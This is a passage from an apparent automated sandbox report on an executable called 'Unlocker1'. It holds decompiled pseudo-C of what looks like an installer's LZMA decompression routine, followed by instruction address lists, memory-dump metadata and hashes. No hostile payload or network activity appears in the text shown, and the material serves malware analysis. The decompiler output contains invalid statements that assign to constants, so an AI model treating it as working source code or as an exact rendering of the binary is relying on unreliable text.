                                                                                                                                                              										 *_t397 = _v48 + __ebx;
                                                                                                                                                              										__eflags =  *_t397;
                                                                                                                                                              										goto L122;
                                                                                                                                                              									}
                                                                                                                                                              									__eax = _v84;
                                                                                                                                                              									_v20 = _v20 >> 0xb;
                                                                                                                                                              									__edi = _v84 + _v84;
                                                                                                                                                              									__eax = _v92;
                                                                                                                                                              									__esi = __edi + __eax;
                                                                                                                                                              									_v88 = __esi;
                                                                                                                                                              									__ax =  *__esi;
                                                                                                                                                              									__ecx = __ax & 0x0000ffff;
                                                                                                                                                              									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                                                              									__eflags = _v16 - __edx;
                                                                                                                                                              									if(_v16 >= __edx) {
                                                                                                                                                              										__ecx = 0;
                                                                                                                                                              										_v20 = _v20 - __edx;
                                                                                                                                                              										__ecx = 1;
                                                                                                                                                              										_v16 = _v16 - __edx;
                                                                                                                                                              										__ebx = 1;
                                                                                                                                                              										__ecx = _v76;
                                                                                                                                                              										__ebx = 1 << __cl;
                                                                                                                                                              										__ecx = 1 << __cl;
                                                                                                                                                              										__ebx = _v72;
                                                                                                                                                              										__ebx = _v72 | __ecx;
                                                                                                                                                              										__cx = __ax;
                                                                                                                                                              										__cx = __ax >> 5;
                                                                                                                                                              										__eax = __eax - __ecx;
                                                                                                                                                              										__edi = __edi + 1;
                                                                                                                                                              										__eflags = __edi;
                                                                                                                                                              										_v72 = __ebx;
                                                                                                                                                              										 *__esi = __ax;
                                                                                                                                                              										_v84 = __edi;
                                                                                                                                                              									} else {
                                                                                                                                                              										_v20 = __edx;
                                                                                                                                                              										0x800 = 0x800 - __ecx;
                                                                                                                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              										_v84 = _v84 << 1;
                                                                                                                                                              										 *__esi = __dx;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _v20 - 0x1000000;
                                                                                                                                                              									if(_v20 >= 0x1000000) {
                                                                                                                                                              										L114:
                                                                                                                                                              										_t374 =  &_v76;
                                                                                                                                                              										 *_t374 = _v76 + 1;
                                                                                                                                                              										__eflags =  *_t374;
                                                                                                                                                              										goto L115;
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L112;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								__ecx = _v16;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								_v20 = _v20 >> 1;
                                                                                                                                                              								__eflags = _v16 - _v20;
                                                                                                                                                              								_v72 = __ebx;
                                                                                                                                                              								if(_v16 >= _v20) {
                                                                                                                                                              									__ecx = _v20;
                                                                                                                                                              									_v16 = _v16 - _v20;
                                                                                                                                                              									__ebx = __ebx | 0x00000001;
                                                                                                                                                              									__eflags = __ebx;
                                                                                                                                                              									_v72 = __ebx;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v20 - 0x1000000;
                                                                                                                                                              								if(_v20 >= 0x1000000) {
                                                                                                                                                              									L104:
                                                                                                                                                              									_t344 =  &_v76;
                                                                                                                                                              									 *_t344 = _v76 - 1;
                                                                                                                                                              									__eflags =  *_t344;
                                                                                                                                                              									goto L105;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L102;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__edx = _v8;
                                                                                                                                                              							__eax = __eax - __ebx;
                                                                                                                                                              							_v68 = __ecx;
                                                                                                                                                              							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                                                              							goto L111;
                                                                                                                                                              						case 0x1a:
                                                                                                                                                              							L58:
                                                                                                                                                              							__eflags = _v104;
                                                                                                                                                              							if(_v104 == 0) {
                                                                                                                                                              								_v140 = 0x1a;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v108;
                                                                                                                                                              							__al = _v96;
                                                                                                                                                              							__edx = _v12;
                                                                                                                                                              							_v100 = _v100 + 1;
                                                                                                                                                              							_v108 = _v108 + 1;
                                                                                                                                                              							_v104 = _v104 - 1;
                                                                                                                                                              							 *_v108 = __al;
                                                                                                                                                              							__ecx = _v24;
                                                                                                                                                              							 *(_v12 + __ecx) = __al;
                                                                                                                                                              							__eax = __ecx + 1;
                                                                                                                                                              							__edx = 0;
                                                                                                                                                              							_t197 = __eax % _v120;
                                                                                                                                                              							__eax = __eax / _v120;
                                                                                                                                                              							__edx = _t197;
                                                                                                                                                              							goto L82;
                                                                                                                                                              						case 0x1b:
                                                                                                                                                              							L78:
                                                                                                                                                              							__eflags = _v104;
                                                                                                                                                              							if(_v104 == 0) {
                                                                                                                                                              								_v140 = 0x1b;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v24;
                                                                                                                                                              							__eax = _v24 - _v48;
                                                                                                                                                              							__eflags = __eax - _v120;
                                                                                                                                                              							if(__eax >= _v120) {
                                                                                                                                                              								__eax = __eax + _v120;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              							}
                                                                                                                                                              							__edx = _v12;
                                                                                                                                                              							__cl =  *(__edx + __eax);
                                                                                                                                                              							__eax = _v24;
                                                                                                                                                              							_v96 = __cl;
                                                                                                                                                              							 *(__edx + __eax) = __cl;
                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                              							__edx = 0;
                                                                                                                                                              							_t280 = __eax % _v120;
                                                                                                                                                              							__eax = __eax / _v120;
                                                                                                                                                              							__edx = _t280;
                                                                                                                                                              							__eax = _v108;
                                                                                                                                                              							_v100 = _v100 + 1;
                                                                                                                                                              							_v108 = _v108 + 1;
                                                                                                                                                              							_t289 =  &_v104;
                                                                                                                                                              							 *_t289 = _v104 - 1;
                                                                                                                                                              							__eflags =  *_t289;
                                                                                                                                                              							 *_v108 = __cl;
                                                                                                                                                              							L82:
                                                                                                                                                              							_v24 = __edx;
                                                                                                                                                              							goto L83;
                                                                                                                                                              						case 0x1c:
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L126:
                                                                                                                                                              								__eflags = _v104;
                                                                                                                                                              								if(_v104 == 0) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = _v24;
                                                                                                                                                              								__eax = _v24 - _v48;
                                                                                                                                                              								__eflags = __eax - _v120;
                                                                                                                                                              								if(__eax >= _v120) {
                                                                                                                                                              									__eax = __eax + _v120;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              								}
                                                                                                                                                              								__edx = _v12;
                                                                                                                                                              								__cl =  *(__edx + __eax);
                                                                                                                                                              								__eax = _v24;
                                                                                                                                                              								_v96 = __cl;
                                                                                                                                                              								 *(__edx + __eax) = __cl;
                                                                                                                                                              								__eax = __eax + 1;
                                                                                                                                                              								__edx = 0;
                                                                                                                                                              								_t420 = __eax % _v120;
                                                                                                                                                              								__eax = __eax / _v120;
                                                                                                                                                              								__edx = _t420;
                                                                                                                                                              								__eax = _v108;
                                                                                                                                                              								_v108 = _v108 + 1;
                                                                                                                                                              								_v104 = _v104 - 1;
                                                                                                                                                              								_v52 = _v52 - 1;
                                                                                                                                                              								__eflags = _v52;
                                                                                                                                                              								 *_v108 = __cl;
                                                                                                                                                              								_v24 = _t420;
                                                                                                                                                              								if(_v52 > 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								} else {
                                                                                                                                                              									L83:
                                                                                                                                                              									_v140 = 2;
                                                                                                                                                              									goto L3;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							_v140 = 0x1c;
                                                                                                                                                              							L173:
                                                                                                                                                              							_push(0x22);
                                                                                                                                                              							_pop(_t574);
                                                                                                                                                              							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                                                              							return 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				L174:
                                                                                                                                                              				_t538 = _t537 | 0xffffffff;
                                                                                                                                                              				return _t538;
                                                                                                                                                              			}

                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00405faf
                                                                                                                                                              0x00405fb3
                                                                                                                                                              0x00405fb6
                                                                                                                                                              0x00405fb8
                                                                                                                                                              0x00405fbb
                                                                                                                                                              0x00405fbe
                                                                                                                                                              0x00405fc0
                                                                                                                                                              0x00405fc3
                                                                                                                                                              0x00405fc5
                                                                                                                                                              0x00405fca
                                                                                                                                                              0x00405fcd
                                                                                                                                                              0x00405fd0
                                                                                                                                                              0x00405fd4
                                                                                                                                                              0x00405fdb
                                                                                                                                                              0x00405fde
                                                                                                                                                              0x00405fe5
                                                                                                                                                              0x00405fe9
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405ff1
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405feb
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405fe0
                                                                                                                                                              0x00405ff5
                                                                                                                                                              0x00405ff8
                                                                                                                                                              0x00406016
                                                                                                                                                              0x00406018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406018
                                                                                                                                                              0x00405ffa
                                                                                                                                                              0x00405ffd
                                                                                                                                                              0x00406000
                                                                                                                                                              0x00406003
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406005
                                                                                                                                                              0x00406008
                                                                                                                                                              0x0040600b
                                                                                                                                                              0x0040600d
                                                                                                                                                              0x0040600e
                                                                                                                                                              0x00406011
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406247
                                                                                                                                                              0x0040624b
                                                                                                                                                              0x00406269
                                                                                                                                                              0x0040626c
                                                                                                                                                              0x00406273
                                                                                                                                                              0x00406276
                                                                                                                                                              0x00406279
                                                                                                                                                              0x0040627c
                                                                                                                                                              0x0040627f
                                                                                                                                                              0x00406282
                                                                                                                                                              0x00406284
                                                                                                                                                              0x0040628b
                                                                                                                                                              0x0040628c
                                                                                                                                                              0x0040628e
                                                                                                                                                              0x00406291
                                                                                                                                                              0x00406294
                                                                                                                                                              0x00406297
                                                                                                                                                              0x00406297
                                                                                                                                                              0x0040629c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629c
                                                                                                                                                              0x0040624d
                                                                                                                                                              0x00406250
                                                                                                                                                              0x00406253
                                                                                                                                                              0x0040625d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004062b1
                                                                                                                                                              0x004062b5
                                                                                                                                                              0x004062d8
                                                                                                                                                              0x004062db
                                                                                                                                                              0x004062de
                                                                                                                                                              0x004062e8
                                                                                                                                                              0x004062b7
                                                                                                                                                              0x004062b7
                                                                                                                                                              0x004062ba
                                                                                                                                                              0x004062bd
                                                                                                                                                              0x004062c0
                                                                                                                                                              0x004062cd
                                                                                                                                                              0x004062d0
                                                                                                                                                              0x004062d0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004062f4
                                                                                                                                                              0x004062f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004062fe
                                                                                                                                                              0x00406302
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406308
                                                                                                                                                              0x0040630a
                                                                                                                                                              0x0040630e
                                                                                                                                                              0x0040630e
                                                                                                                                                              0x00406311
                                                                                                                                                              0x00406315
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406365
                                                                                                                                                              0x00406369
                                                                                                                                                              0x00406370
                                                                                                                                                              0x00406373
                                                                                                                                                              0x00406376
                                                                                                                                                              0x00406380
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406380
                                                                                                                                                              0x0040636b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040638c
                                                                                                                                                              0x00406390
                                                                                                                                                              0x00406397
                                                                                                                                                              0x0040639a
                                                                                                                                                              0x0040639d
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x004063a0
                                                                                                                                                              0x004063a3
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a9
                                                                                                                                                              0x004063ac
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063b2
                                                                                                                                                              0x004063b9
                                                                                                                                                              0x004063be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040644c
                                                                                                                                                              0x0040644c
                                                                                                                                                              0x00406450
                                                                                                                                                              0x004067ee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ee
                                                                                                                                                              0x00406456
                                                                                                                                                              0x00406459
                                                                                                                                                              0x0040645c
                                                                                                                                                              0x00406460
                                                                                                                                                              0x00406463
                                                                                                                                                              0x00406469
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646e
                                                                                                                                                              0x00406471
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406041
                                                                                                                                                              0x00406041
                                                                                                                                                              0x00406045
                                                                                                                                                              0x004067b2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067b2
                                                                                                                                                              0x0040604b
                                                                                                                                                              0x0040604e
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066ec
                                                                                                                                                              0x00406824
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406824
                                                                                                                                                              0x004066f2
                                                                                                                                                              0x004066f5
                                                                                                                                                              0x004066f8
                                                                                                                                                              0x004066fc
                                                                                                                                                              0x004066ff
                                                                                                                                                              0x00406705
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x0040670a
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406714
                                                                                                                                                              0x00406774
                                                                                                                                                              0x00406777
                                                                                                                                                              0x0040677c
                                                                                                                                                              0x0040677d
                                                                                                                                                              0x0040677f
                                                                                                                                                              0x00406781
                                                                                                                                                              0x00406784
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671c
                                                                                                                                                              0x0040671f
                                                                                                                                                              0x00406722
                                                                                                                                                              0x00406725
                                                                                                                                                              0x00406728
                                                                                                                                                              0x0040672b
                                                                                                                                                              0x0040672e
                                                                                                                                                              0x00406731
                                                                                                                                                              0x00406734
                                                                                                                                                              0x00406737
                                                                                                                                                              0x00406750
                                                                                                                                                              0x00406753
                                                                                                                                                              0x00406756
                                                                                                                                                              0x00406759
                                                                                                                                                              0x0040675d
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x00406760
                                                                                                                                                              0x00406763
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406741
                                                                                                                                                              0x00406746
                                                                                                                                                              0x00406748
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x00406766
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040640b
                                                                                                                                                              0x0040640e
                                                                                                                                                              0x00406444
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406577
                                                                                                                                                              0x00406577
                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                                                              • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                                                                                                                                              • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                                                              • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00406247() {
                                                                                                                                                              				signed int _t539;
                                                                                                                                                              				unsigned short _t540;
                                                                                                                                                              				signed int _t541;
                                                                                                                                                              				void _t542;
                                                                                                                                                              				signed int _t543;
                                                                                                                                                              				signed int _t544;
                                                                                                                                                              				signed int _t573;
                                                                                                                                                              				signed int _t576;
                                                                                                                                                              				signed int _t597;
                                                                                                                                                              				signed int* _t614;
                                                                                                                                                              				void* _t621;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					if( *(_t621 - 0x40) != 1) {
                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                                                              						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                                                              						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                                                              						 *(_t621 - 0x58) = _t539;
                                                                                                                                                              						goto L68;
                                                                                                                                                              					} else {
                                                                                                                                                              						 *(__ebp - 0x84) = 8;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L132:
                                                                                                                                                              							 *(_t621 - 0x54) = _t614;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L133:
                                                                                                                                                              								_t540 =  *_t614;
                                                                                                                                                              								_t597 = _t540 & 0x0000ffff;
                                                                                                                                                              								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                              								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                              									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                              									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                              									 *(_t621 - 0x40) = 1;
                                                                                                                                                              									_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                              									 *_t614 = _t541;
                                                                                                                                                              								} else {
                                                                                                                                                              									 *(_t621 - 0x10) = _t573;
                                                                                                                                                              									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                              									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                              								}
                                                                                                                                                              								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                              									goto L139;
                                                                                                                                                              								}
                                                                                                                                                              								L137:
                                                                                                                                                              								if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                              									 *(_t621 - 0x88) = 5;
                                                                                                                                                              									L170:
                                                                                                                                                              									_t576 = 0x22;
                                                                                                                                                              									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                                                              									_t544 = 0;
                                                                                                                                                              									L172:
                                                                                                                                                              									return _t544;
                                                                                                                                                              								}
                                                                                                                                                              								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                                                              								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                              								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                              								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                              								L139:
                                                                                                                                                              								_t542 =  *(_t621 - 0x84);
                                                                                                                                                              								while(1) {
                                                                                                                                                              									 *(_t621 - 0x88) = _t542;
                                                                                                                                                              									while(1) {
                                                                                                                                                              										L1:
                                                                                                                                                              										_t543 =  *(_t621 - 0x88);
                                                                                                                                                              										if(_t543 > 0x1c) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										switch( *((intOrPtr*)(_t543 * 4 +  &M0040684B))) {
                                                                                                                                                              											case 0:
                                                                                                                                                              												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                              												_t543 =  *( *(_t621 - 0x70));
                                                                                                                                                              												if(_t543 > 0xe1) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												}
                                                                                                                                                              												_t547 = _t543 & 0x000000ff;
                                                                                                                                                              												_push(0x2d);
                                                                                                                                                              												asm("cdq");
                                                                                                                                                              												_pop(_t578);
                                                                                                                                                              												_push(9);
                                                                                                                                                              												_pop(_t579);
                                                                                                                                                              												_t617 = _t547 / _t578;
                                                                                                                                                              												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                                                              												asm("cdq");
                                                                                                                                                              												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                                                              												 *(_t621 - 0x3c) = _t612;
                                                                                                                                                              												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                                                              												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                                                              												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                                                              												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                                                              													L10:
                                                                                                                                                              													if(_t620 == 0) {
                                                                                                                                                              														L12:
                                                                                                                                                              														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                                                              														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                              														goto L15;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L11;
                                                                                                                                                              													}
                                                                                                                                                              													do {
                                                                                                                                                              														L11:
                                                                                                                                                              														_t620 = _t620 - 1;
                                                                                                                                                              														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                                                              													} while (_t620 != 0);
                                                                                                                                                              													goto L12;
                                                                                                                                                              												}
                                                                                                                                                              												if( *(_t621 - 4) != 0) {
                                                                                                                                                              													GlobalFree( *(_t621 - 4)); // executed
                                                                                                                                                              												}
                                                                                                                                                              												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              												 *(_t621 - 4) = _t543;
                                                                                                                                                              												if(_t543 == 0) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                                                              													goto L10;
                                                                                                                                                              												}
                                                                                                                                                              											case 1:
                                                                                                                                                              												L13:
                                                                                                                                                              												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                              												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                              													 *(_t621 - 0x88) = 1;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                              												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                                                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                              												_t45 = _t621 - 0x48;
                                                                                                                                                              												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                                                              												__eflags =  *_t45;
                                                                                                                                                              												L15:
                                                                                                                                                              												if( *(_t621 - 0x48) < 4) {
                                                                                                                                                              													goto L13;
                                                                                                                                                              												}
                                                                                                                                                              												_t555 =  *(_t621 - 0x40);
                                                                                                                                                              												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                                                              													L20:
                                                                                                                                                              													 *(_t621 - 0x48) = 5;
                                                                                                                                                              													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              													goto L23;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t621 - 0x74) = _t555;
                                                                                                                                                              												if( *(_t621 - 8) != 0) {
                                                                                                                                                              													GlobalFree( *(_t621 - 8)); // executed
                                                                                                                                                              												}
                                                                                                                                                              												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                                                              												 *(_t621 - 8) = _t543;
                                                                                                                                                              												if(_t543 == 0) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L20;
                                                                                                                                                              												}
                                                                                                                                                              											case 2:
                                                                                                                                                              												L24:
                                                                                                                                                              												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                                                              												 *(_t621 - 0x84) = 6;
                                                                                                                                                              												 *(_t621 - 0x4c) = _t562;
                                                                                                                                                              												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                                                              												goto L132;
